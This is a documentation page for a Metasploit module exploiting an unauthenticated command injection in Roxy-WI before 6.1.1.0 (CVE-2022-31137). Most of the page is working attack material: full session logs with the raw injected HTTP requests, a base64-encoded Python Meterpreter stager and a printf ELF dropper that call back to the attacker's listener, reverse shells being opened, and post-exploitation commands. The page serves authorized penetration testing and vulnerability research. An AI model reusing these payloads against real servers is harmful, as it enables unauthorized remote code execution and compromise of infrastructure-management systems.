Roxy-WI Prior to 6.1.1.0 Unauthenticated Command Injection RCE - Metasploit


This page contains detailed information about how to use the exploit/linux/http/roxy_wi_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Roxy-WI Prior to 6.1.1.0 Unauthenticated Command Injection RCE
Module: exploit/linux/http/roxy_wi_exec
Source code: modules/exploits/linux/http/roxy_wi_exec.rb
Disclosure date: 2022-07-06
Last modification time: 2022-07-25 13:05:04 +0000
Supported architecture(s): cmd, x86, x64
Supported platform(s): Linux, Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2022-3113, CVE-2022-31137

This module exploits an unauthenticated command injection vulnerability in Roxy-WI prior to version 6.1.1.0. Successful exploitation results in remote code execution under the context of the web server user. Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


msf > use exploit/linux/http/roxy_wi_exec
msf exploit(roxy_wi_exec) > exploit

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

Knowledge Base


Vulnerable Application


This module exploits an unauthenticated command injection vulnerability in Roxy-WI prior to version 6.1.1.0. Successful exploitation results in remote code execution under the context of the web server user.

Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers.

Setup

Roxy-WI requires Python and a web server to run. Please visit following url to find out required python and other packages.

First grab a vulnerable copy of the code from the release pages at https://github.com/hap-wi/roxy-wi/releases. You will likely want to grab version 6.1.0.0 from https://github.com/hap-wi/roxy-wi/archive/refs/tags/v6.1.0.0.tar.gz

Next follow the installation instructions at https://roxy-wi.org/installation.py#manual and be sure to replace apache with www-data where applicable if your using Debian or Ubuntu (they call this out in their instructions however it can be a bit hard to find which is why I'm noting it here).

Once you are done you should have a working copy of Roxy-Wi. Note that for some reason the login page didn't work for me in testing, however everything needed to test this module should be set up and operating as expected.

Verification Steps


  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/linux/http/roxy_wi_exec
  4. Set RHOST to the address of the target Roxy-WI machine.
  5. Set LHOST to the address of your attacking machine.
  6. Run exploit
  7. Do: run
  8. You should get a shell as the user running the Roxy-WI server.

Targets


0

This executes a Unix command.

1

This uses a Linux dropper to execute code.

Options


TARGETURI

The base path to Roxy-WI. The default value is /.

Scenarios


Roxy-WI 6.1.0.0 Ubuntu 22.04 GNU/Linux (x86_64) - Apache/2.4.52 / Python 3.10.4 / MySQL 8.0.29 With Unix In-Memory Target

    msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/linux/http/roxy_wi_exec 
    [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
    msf6 exploit(linux/http/roxy_wi_exec) > show options

    Module options (exploit/linux/http/roxy_wi_exec):

       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       Proxies                     no        A proxy chain of format type:host:port[,type:hos
                                             t:port][...]
       RHOSTS                      yes       The target host(s), see https://github.com/rapid
                                             7/metasploit-framework/wiki/Using-Metasploit
       RPORT      443              yes       The target port (TCP)
       SRVHOST    0.0.0.0          yes       The local host or network interface to listen on
                                             . This must be an address on the local machine o
                                             r 0.0.0.0 to listen on all addresses.
       SRVPORT    8080             yes       The local port to listen on.
       SSL        true             no        Negotiate SSL/TLS for outgoing connections
       SSLCert                     no        Path to a custom SSL certificate (default is ran
                                             domly generated)
       TARGETURI  /                yes       The URI of the vulnerable instance
       URIPATH                     no        The URI to use for this exploit (default is rand
                                             om)
       VHOST                       no        HTTP server virtual host


    Payload options (cmd/unix/python/meterpreter/reverse_tcp):

       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  172.22.230.145   yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port


    Exploit target:

       Id  Name
       --  ----
       0   Unix (In-Memory)


    msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 127.0.0.1
    RHOST => 127.0.0.1
    msf6 exploit(linux/http/roxy_wi_exec) > set HttpTrace true
    HttpTrace => true
    msf6 exploit(linux/http/roxy_wi_exec) > run

    [*] Started reverse TCP handler on 172.22.230.145:4444 
    [*] Running automatic check ("set AutoCheck false" to disable)
    [*] Checking if 127.0.0.1:443 is vulnerable!
    ####################
    # Request:
    ####################
    POST /app/options.py HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 93

    serv=127.0.0.1&ipbackend=%22%3b%20id%20%3b%23&alert_consumer=iufmgha&backend_server=127.0.0.1
    ####################
    # Response:
    ####################
    HTTP/1.1 200 OK
    Date: Mon, 25 Jul 2022 18:46:55 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Vary: Accept-Encoding
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8

    <center><div class="alert alert-danger">Check the config file. Presence section configs and parameter haproxy_save_configs_dir</div>
    Content-type: text/html

    <center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
    Content-type: text/html

    <center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
    Content-type: text/html

    uid=33(www-data) gid=33(www-data) groups=33(www-data)

    [*] 127.0.0.1:443 is vulnerable!
    [+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
    [*] Exploiting...
    ####################
    # Request:
    ####################
    POST /app/options.py HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 760

    serv=127.0.0.1&ipbackend=%22%3b%20echo%20exec\%28__import__\%28\%27base64\%27\%29.b64decode\%28__import__\%28\%27codecs\%27\%29.getencoder\%28\%27utf-8\%27\%29\%28\%27aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE3Mi4yMi4yMzAuMTQ1Jyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc%2bSScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyh6bGliLmRlY29tcHJlc3MoYmFzZTY0LmI2NGRlY29kZShkKSkseydzJzpzfSkK\%27\%29\%5b0\%5d\%29\%29%20%7c%20exec%20%24%28which%20python%20%7c%7c%20which%20python3%20%7c%7c%20which%20python2%29%20-%20%3b%23&alert_consumer=gumovpt&backend_server=127.0.0.1
    [*] Sending stage (40164 bytes) to 172.22.230.145
    [*] Meterpreter session 1 opened (172.22.230.145:4444 -> 172.22.230.145:41506) at 2022-07-25 13:46:56 -0500
    ####################
    # Response:
    ####################
    No response received

    meterpreter > getuid
    Server username: www-data
    meterpreter > sysinfo
    Computer     : gwillcox-Virtual-Machine
    OS           : Linux 5.15.0-41-generic #44-Ubuntu SMP Wed Jun 22 14:20:53 UTC 2022
    Architecture : x64
    Meterpreter  : python/linux
    meterpreter > pwd
    /var/www/haproxy-wi/app
    meterpreter > ls
    Listing: /var/www/haproxy-wi/app
    ================================

    Mode              Size    Type  Last modified              Name
    ----              ----    ----  -------------              ----
    100664/rw-rw-r--  83      fil   2022-06-30 02:43:57 -0500  .htaccess
    040755/rwxr-xr-x  4096    dir   2022-07-25 13:36:33 -0500  __pycache__
    100775/rwxrwxr-x  12822   fil   2022-06-30 02:43:57 -0500  add.py
    040775/rwxrwxr-x  4096    dir   2022-06-30 02:43:57 -0500  certs
    100775/rwxrwxr-x  4745    fil   2022-06-30 02:43:57 -0500  config.py
    100775/rwxrwxr-x  33194   fil   2022-06-30 02:43:57 -0500  create_db.py
    100775/rwxrwxr-x  14945   fil   2022-06-30 02:43:57 -0500  db_model.py
    100775/rwxrwxr-x  64688   fil   2022-06-30 02:43:57 -0500  funct.py
    100775/rwxrwxr-x  913     fil   2022-06-30 02:43:57 -0500  ha.py
    100775/rwxrwxr-x  8544    fil   2022-06-30 02:43:57 -0500  hapservers.py
    100775/rwxrwxr-x  3008    fil   2022-06-30 02:43:57 -0500  history.py
    100775/rwxrwxr-x  7145    fil   2022-06-30 02:43:57 -0500  login.py
    100775/rwxrwxr-x  1696    fil   2022-06-30 02:43:57 -0500  logs.py
    100775/rwxrwxr-x  1598    fil   2022-06-30 02:43:57 -0500  metrics.py
    100775/rwxrwxr-x  966     fil   2022-06-30 02:43:57 -0500  nettools.py
    100775/rwxrwxr-x  181104  fil   2022-06-30 02:43:57 -0500  options.py
    100775/rwxrwxr-x  4096    fil   2022-06-30 02:43:57 -0500  overview.py
    100775/rwxrwxr-x  1884    fil   2022-06-30 02:43:57 -0500  portscanner.py
    100775/rwxrwxr-x  1125    fil   2022-06-30 02:43:57 -0500  provisioning.py
    100644/rw-r--r--  274432  fil   2022-07-25 13:41:13 -0500  roxy-wi.db
    100775/rwxrwxr-x  750     fil   2022-06-30 02:43:57 -0500  runtimeapi.py
    040775/rwxrwxr-x  4096    dir   2022-06-30 02:43:57 -0500  scripts
    100775/rwxrwxr-x  2486    fil   2022-06-30 02:43:57 -0500  sections.py
    100775/rwxrwxr-x  1580    fil   2022-06-30 02:43:57 -0500  servers.py
    100775/rwxrwxr-x  1826    fil   2022-06-30 02:43:57 -0500  smon.py
    100775/rwxrwxr-x  103924  fil   2022-06-30 02:43:57 -0500  sql.py
    040775/rwxrwxr-x  4096    dir   2022-06-30 02:43:57 -0500  templates
    100775/rwxrwxr-x  1361    fil   2022-06-30 02:43:57 -0500  users.py
    100775/rwxrwxr-x  4150    fil   2022-06-30 02:43:57 -0500  versions.py
    100775/rwxrwxr-x  2076    fil   2022-06-30 02:43:57 -0500  viewlogs.py
    100775/rwxrwxr-x  1150    fil   2022-06-30 02:43:57 -0500  viewsttats.py
    100775/rwxrwxr-x  1819    fil   2022-06-30 02:43:57 -0500  waf.py

    meterpreter > 

Roxy-WI 6.1.0.0 Ubuntu 22.04 GNU/Linux (x86_64) - Apache/2.4.52 / Python 3.10.4 / MySQL 8.0.29 With Linux Dropper Target

    msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/linux/http/roxy_wi_exec 
    [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
    msf6 exploit(linux/http/roxy_wi_exec) > show options

    Module options (exploit/linux/http/roxy_wi_exec):

       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       Proxies                     no        A proxy chain of format type:host:port[,type:hos
                                             t:port][...]
       RHOSTS                      yes       The target host(s), see https://github.com/rapid
                                             7/metasploit-framework/wiki/Using-Metasploit
       RPORT      443              yes       The target port (TCP)
       SRVHOST    0.0.0.0          yes       The local host or network interface to listen on
                                             . This must be an address on the local machine o
                                             r 0.0.0.0 to listen on all addresses.
       SRVPORT    8080             yes       The local port to listen on.
       SSL        true             no        Negotiate SSL/TLS for outgoing connections
       SSLCert                     no        Path to a custom SSL certificate (default is ran
                                             domly generated)
       TARGETURI  /                yes       The URI of the vulnerable instance
       URIPATH                     no        The URI to use for this exploit (default is rand
                                             om)
       VHOST                       no        HTTP server virtual host


    Payload options (cmd/unix/python/meterpreter/reverse_tcp):

       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  172.22.230.145   yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port


    Exploit target:

       Id  Name
       --  ----
       0   Unix (In-Memory)


    msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 127.0.0.1
    RHOST => 127.0.0.1
    msf6 exploit(linux/http/roxy_wi_exec) > set HttpTrace true
    HttpTrace => true
    msf6 exploit(linux/http/roxy_wi_exec) > set Target 1 
    Target => 1
    msf6 exploit(linux/http/roxy_wi_exec) > set payload linux/x64/shell/reverse_tcp 
    payload => linux/x64/shell/reverse_tcp
    msf6 exploit(linux/http/roxy_wi_exec) > show options

    Module options (exploit/linux/http/roxy_wi_exec):

       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       Proxies                     no        A proxy chain of format type:host:port[,type:hos
                                             t:port][...]
       RHOSTS     127.0.0.1        yes       The target host(s), see https://github.com/rapid
                                             7/metasploit-framework/wiki/Using-Metasploit
       RPORT      443              yes       The target port (TCP)
       SRVHOST    0.0.0.0          yes       The local host or network interface to listen on
                                             . This must be an address on the local machine o
                                             r 0.0.0.0 to listen on all addresses.
       SRVPORT    8080             yes       The local port to listen on.
       SSL        true             no        Negotiate SSL/TLS for outgoing connections
       SSLCert                     no        Path to a custom SSL certificate (default is ran
                                             domly generated)
       TARGETURI  /                yes       The URI of the vulnerable instance
       URIPATH                     no        The URI to use for this exploit (default is rand
                                             om)
       VHOST                       no        HTTP server virtual host


    Payload options (linux/x64/shell/reverse_tcp):

       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  172.22.230.145   yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port


    Exploit target:

       Id  Name
       --  ----
       1   Linux (Dropper)


    msf6 exploit(linux/http/roxy_wi_exec) > run

    [*] Started reverse TCP handler on 172.22.230.145:4444 
    [*] Running automatic check ("set AutoCheck false" to disable)
    [*] Checking if 127.0.0.1:443 is vulnerable!
    ####################
    # Request:
    ####################
    POST /app/options.py HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 93

    serv=127.0.0.1&ipbackend=%22%3b%20id%20%3b%23&alert_consumer=oodqhqe&backend_server=127.0.0.1
    ####################
    # Response:
    ####################
    HTTP/1.1 200 OK
    Date: Mon, 25 Jul 2022 19:07:53 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Vary: Accept-Encoding
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8

    <center><div class="alert alert-danger">Check the config file. Presence section configs and parameter haproxy_save_configs_dir</div>
    Content-type: text/html

    <center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
    Content-type: text/html

    <center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
    Content-type: text/html

    uid=33(www-data) gid=33(www-data) groups=33(www-data)

    [*] 127.0.0.1:443 is vulnerable!
    [+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
    [*] Exploiting...
    ####################
    # Request:
    ####################
    POST /app/options.py HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 939

    serv=127.0.0.1&ipbackend=%22%3b%20printf%20%27\177\105\114\106\2\1\1\0\0\0\0\0\0\0\0\0\2\0\76\0\1\0\0\0\170\0\100\0\0\0\0\0\100\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\100\0\70\0\1\0\0\0\0\0\0\0\1\0\0\0\7\0\0\0\0\0\0\0\0\0\0\0\0\0\100\0\0\0\0\0\0\0\100\0\0\0\0\0\372\0\0\0\0\0\0\0\174\1\0\0\0\0\0\0\0\20\0\0\0\0\0\0\110\61\377\152\11\130\231\266\20\110\211\326\115\61\311\152\42\101\132\262\7\17\5\110\205\300\170\121\152\12\101\131\120\152\51\130\231\152\2\137\152\1\136\17\5\110\205\300\170\73\110\227\110\271\2\0\21\134\254\26\346\221\121\110\211\346\152\20\132\152\52\130\17\5\131\110\205\300\171\45\111\377\311\164\30\127\152\43\130\152\0\152\5\110\211\347\110\61\366\17\5\131\131\137\110\205\300\171\307\152\74\130\152\1\137\17\5\136\152\46\132\17\5\110\205\300\170\355\377\346%27%3e%3e/tmp/olXCy%20%3b%20chmod%20%2bx%20/tmp/olXCy%20%3b%20/tmp/olXCy%20%3b%20rm%20-f%20/tmp/olXCy%20%3b%23&alert_consumer=kvlkaqe&backend_server=127.0.0.1
    [*] Sending stage (38 bytes) to 172.22.230.145
    [*] Command shell session 2 opened (172.22.230.145:4444 -> 172.22.230.145:41508) at 2022-07-25 14:07:59 -0500
    i####################
    # Response:
    ####################
    No response received
    d[*] Command Stager progress - 100.00% done (810/810 bytes)

    id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    whoami
    www-data
    pwd
    /var/www/haproxy-wi/app
    ls
    __pycache__
    add.py
    certs
    config.py
    create_db.py
    db_model.py
    funct.py
    ha.py
    hapservers.py
    history.py
    login.py
    logs.py
    metrics.py
    nettools.py
    options.py
    overview.py
    portscanner.py
    provisioning.py
    roxy-wi.db
    runtimeapi.py
    scripts
    sections.py
    servers.py
    smon.py
    sql.py
    templates
    users.py
    versions.py
    viewlogs.py
    viewsttats.py
    waf.py

Go back to menu.

Msfconsole Usage


Here is how the linux/http/roxy_wi_exec exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/roxy_wi_exec

[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > show info

       Name: Roxy-WI Prior to 6.1.1.0 Unauthenticated Command Injection RCE
     Module: exploit/linux/http/roxy_wi_exec
   Platform: Unix, Linux
       Arch: cmd, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2022-07-06

Provided by:
  Nuri ��ilengir <[email protected]>

Module side effects:
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Unix (In-Memory)
  1   Linux (Dropper)

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT      443              yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0
                                         to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       The URI of the vulnerable instance
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an unauthenticated command injection 
  vulnerability in Roxy-WI prior to version 6.1.1.0. Successful 
  exploitation results in remote code execution under the context of 
  the web server user. Roxy-WI is an interface for managing HAProxy, 
  Nginx and Keepalived servers.

References:
  https://pentest.blog/advisory-roxywi-unauthenticated-remote-code-execution-cve-2022-3113/
  https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-53r2-mq99-f532
  https://github.com/hap-wi/roxy-wi/commit/82666df1e60c45dd6aa533b01a392f015d32f755
  https://nvd.nist.gov/vuln/detail/CVE-2022-31137

Module Options


This is a complete list of options available in the linux/http/roxy_wi_exec exploit:

msf6 exploit(linux/http/roxy_wi_exec) > show options

Module options (exploit/linux/http/roxy_wi_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      443              yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.
                                         0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The URI of the vulnerable instance
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.126    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Unix (In-Memory)

Advanced Options


Here is a complete list of advanced options supported by the linux/http/roxy_wi_exec exploit:

msf6 exploit(linux/http/roxy_wi_exec) > show advanced

Module advanced options (exploit/linux/http/roxy_wi_exec):

   Name                     Current Setting                        Required  Description
   ----                     ---------------                        --------  -----------
   AutoCheck                true                                   no        Run check before exploit
   CMDSTAGER::DECODER                                              no        The decoder stub to use.
   CMDSTAGER::FLAVOR        auto                                   no        The CMD Stager to use. (Accepted: auto, printf)
   CMDSTAGER::SSL           false                                  no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                                                 no        Writable directory for staged files
   CMDSTAGER::URIPATH                                              no        Payload URI path for supported stagers
   ContextInformationFile                                          no        The information file that contains context information
   DOMAIN                   WORKSTATION                            yes       The domain to use for Windows authentication
   DigestAuthIIS            true                                   no        Conform to IIS, should work for most servers. Only set to false for
                                                                             non-IIS servers
   DisablePayloadHandler    false                                  no        Disable the handler code for the selected payload
   EXE::Custom                                                     no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR               false                                  no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack            false                                  no        Use the default template in case the specified one is missing
   EXE::Inject              false                                  no        Set to preserve the original EXE function
   EXE::OldMethod           false                                  no        Set to use the substitution EXE generation method.
   EXE::Path                                                       no        The directory in which to look for the executable template
   EXE::Template                                                   no        The executable template file name.
   EnableContextEncoding    false                                  no        Use transient context when encoding payloads
   FingerprintCheck         true                                   no        Conduct a pre-exploit fingerprint verification
   ForceExploit             false                                  no        Override check result
   HttpClientTimeout                                               no        HTTP connection and receive timeout
   HttpPassword                                                    no        The HTTP password to specify for authentication
   HttpRawHeaders                                                  no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace                false                                  no        Show the raw HTTP requests and responses
   HttpTraceColors          red/blu                                no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly     false                                  no        Show HTTP headers only in HttpTrace
   HttpUsername                                                    no        The HTTP username to specify for authentication
   ListenerBindAddress                                             no        The specific IP address to bind to if different from SRVHOST
   ListenerBindPort                                                no        The port to bind to if different from SRVPORT
   ListenerComm                                                    no        The specific communication channel to use for this service
   MSI::Custom                                                     no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR               false                                  no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                       no        The directory in which to look for the msi template
   MSI::Template                                                   no        The msi template file name
   MSI::UAC                 false                                  no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLCipher                                                       no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression           false                                  no        Enable SSL/TLS-level compression
   SSLServerNameIndication                                         no        SSL/TLS Server Name Indication (SNI)
   SSLVersion               Auto                                   yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are a
                                                                             uto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1
                                                                             .2)
   SendRobots               false                                  no        Return a robots.txt file if asked for one
   URIHOST                                                         no        Host to use in URI (useful for tunnels)
   URIPORT                                                         no        Port to use in URI (useful for tunnels)
   UserAgent                Mozilla/5.0 (Macintosh; Intel Mac OS   no        The User-Agent header to use for all requests
                            X 12.2; rv:97.0) Gecko/20100101 Firef
                            ox/97.0
   VERBOSE                  false                                  no        Enable detailed status messages
   WORKSPACE                                                       no        Specify the workspace for this module
   WfsDelay                 25                                     no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/python/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   HttpCookie                                    no        An optional value to use for the Cookie HTTP header
   HttpHostHeader                                no        An optional value to use for the Host HTTP header
   HttpReferer                                   no        An optional value to use for the Referer HTTP header
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugBuild        false            no        Enable debugging for the Python meterpreter
   MeterpreterDebugLogging                       no        The Meterpreter debug logging configuration, see https://github.com/rapid7/metasploit-
                                                           framework/wiki/Meterpreter-Debugging-Meterpreter-Sessions
   MeterpreterTryToFork         true             no        Fork a new process if the functionality is available
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy
                                                           but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/roxy_wi_exec module can exploit:

msf6 exploit(linux/http/roxy_wi_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Unix (In-Memory)
   1   Linux (Dropper)

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/roxy_wi_exec exploit:

msf6 exploit(linux/http/roxy_wi_exec) > show payloads

Compatible Payloads
===================

   #   Name                                                  Disclosure Date  Rank    Check  Description
   -   ----                                                  ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_awk                                              normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   payload/cmd/unix/bind_busybox_telnetd                                  normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   2   payload/cmd/unix/bind_jjs                                              normal  No     Unix Command Shell, Bind TCP (via jjs)
   3   payload/cmd/unix/bind_lua                                              normal  No     Unix Command Shell, Bind TCP (via Lua)
   4   payload/cmd/unix/bind_netcat                                           normal  No     Unix Command Shell, Bind TCP (via netcat)
   5   payload/cmd/unix/bind_netcat_gaping                                    normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   6   payload/cmd/unix/bind_netcat_gaping_ipv6                               normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   7   payload/cmd/unix/bind_nodejs                                           normal  No     Unix Command Shell, Bind TCP (via nodejs)
   8   payload/cmd/unix/bind_perl                                             normal  No     Unix Command Shell, Bind TCP (via Perl)
   9   payload/cmd/unix/bind_perl_ipv6                                        normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   10  payload/cmd/unix/bind_r                                                normal  No     Unix Command Shell, Bind TCP (via R)
   11  payload/cmd/unix/bind_ruby                                             normal  No     Unix Command Shell, Bind TCP (via Ruby)
   12  payload/cmd/unix/bind_ruby_ipv6                                        normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   13  payload/cmd/unix/bind_socat_udp                                        normal  No     Unix Command Shell, Bind UDP (via socat)
   14  payload/cmd/unix/bind_stub                                             normal  No     Unix Command Shell, Bind TCP (stub)
   15  payload/cmd/unix/bind_zsh                                              normal  No     Unix Command Shell, Bind TCP (via Zsh)
   16  payload/cmd/unix/generic                                               normal  No     Unix Command, Generic Command Execution
   17  payload/cmd/unix/pingback_bind                                         normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   18  payload/cmd/unix/pingback_reverse                                      normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   19  payload/cmd/unix/python/meterpreter/bind_tcp                           normal  No     Python Exec, Python Meterpreter, Python Bind TCP Stager
